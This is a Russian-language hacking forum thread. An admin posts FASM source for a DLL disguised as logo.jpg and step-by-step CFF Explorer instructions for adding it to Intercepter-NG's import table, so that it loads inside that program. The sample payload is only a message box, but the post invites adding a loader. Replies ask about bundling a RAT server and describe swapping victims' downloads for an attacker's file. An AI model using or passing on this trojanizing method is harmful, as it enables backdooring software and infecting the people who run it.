Как правильно троянить файлы

Admin

Administrator
Сообщения
843
Оценка реакций
641
Сегодня я покажу вам, как троянить файлы правильно.
Использовать для этого мы будем FASM, CFF Explorer и жопо-файл jpg-файл
Итак, для начала нам надо сделать dll'ку, которую потом переименуем в jpg

Код:
format PE GUI 4.0 DLL

include 'win32ax.inc'
include 'macro\if.inc'
section '.text' code readable executable

proc start hinstDLL:DWORD,fdwReason:DWORD,lpvReserved:DWORD

 mov   eax, TRUE

 .if ([fdwReason] = DLL_PROCESS_ATTACH)
     invoke    MessageBoxA, 0, 'Injected', 'Inj', 0
 .endif

 ret
endp
.end start

proc Malware

   ret;Do nothing
endp

section '.edata' export data readable
 export 'MyImage',\
   Malware,'Malware'
section '.reloc' fixups data discardable
Тут все просто, есть некоторая заглушка в виде функции на экспорте Malware и точка входа

Код:
proc start hinstDLL:DWORD,fdwReason:DWORD,lpvReserved:DWORD

 mov   eax, TRUE

 .if ([fdwReason] = DLL_PROCESS_ATTACH)
     invoke    MessageBoxA, 0, 'Injected', 'Inj', 0
 .endif

 ret
endp
на точке входа просто выводим мессаджбокс "injected". Но сюда ничто не мешает нам добавить лоадер нерезидентный.

Итак. Компилируем все это дело, получаем некоторый *.dll. Переименуем-ка ее в logo.jpg и кинем в папку с софтом.
97cvjm7221111.png
Отлично, теперь мы должны заставить нашу logo.jpg запускаться как dll в контексте Intercepter-ng. Для этого открываем его в CFF Explorer'е и переходим во вкладку Import Adder.
Жмем Add ( он будет выделен синеньким ) и выбираем Logo.jpg, далее выбираем нашу заглушку Malware и жмем Import By Name, попутно снимая галочку с Rebuild with OFTs

В итоге увидим такое:
WNcZFk222222222222.png
Жмем Rebuild Import Table, закрываем CFF Explorer. Он спросит сохранить - жмем да, он спросит перезаписать - жмем да.
Отлично, теперь врубим наш intercepter-ng
woSZXHI333333333333333.png
И видим, что наша длл успешно заинжектилась в процесс. Отлично
 

JackDaniels

Member
Сообщения
48
Оценка реакций
1
а как exe сервер кометы к примеру запихать?
 
E

ERMAG

в intercepter-ng есть интересная штучка с exe или другое что то делаешь ожидание человек скачивает не важно хоть ав с офф сайта но скачивается именно твой файл сам лично тестил.
 

ergood

Member
Сообщения
43
Оценка реакций
11
на сколько актуальная тема в данный момент ? и ещё вроде как работает этот снифер intercepter-ng в локалке будет ли это работать за натом ?